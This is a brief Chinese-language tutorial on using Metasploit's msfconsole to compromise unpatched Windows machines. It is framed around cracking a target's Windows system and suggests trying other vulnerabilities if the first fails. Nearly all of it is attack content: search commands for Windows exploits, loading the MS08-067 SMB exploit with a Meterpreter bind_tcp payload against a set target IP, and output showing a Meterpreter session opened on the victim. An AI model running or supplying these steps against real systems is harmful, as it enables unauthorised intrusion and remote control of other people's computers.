使用msfconsole 查看window发布的漏洞
运气好的话 你要破解的windows没有打补丁.那么使用该漏洞你就可以直接登陆到windows了
# msfconsole
msf > search platform: windows xp sp3
msf > search platform: windows 10
msf > search platform: android
msf > info exploit/windows/smb/ms08_067_netapi
使用info查看漏洞信息.
msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108 (设置目标主机IP地址)
> exploit
设定攻击方式.攻击ip
攻击成功:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32
meterpreter >
失败就尝试其他漏洞